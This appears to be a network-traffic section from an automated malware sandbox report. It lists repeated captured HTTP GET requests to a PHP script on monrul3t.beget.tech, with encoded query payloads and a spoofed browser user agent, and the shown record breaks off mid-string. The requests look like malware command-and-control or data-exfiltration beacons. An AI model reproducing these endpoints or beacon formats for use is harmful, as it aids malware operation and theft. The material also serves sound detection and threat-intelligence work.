M1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dRp2T0EkaPVTRqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXT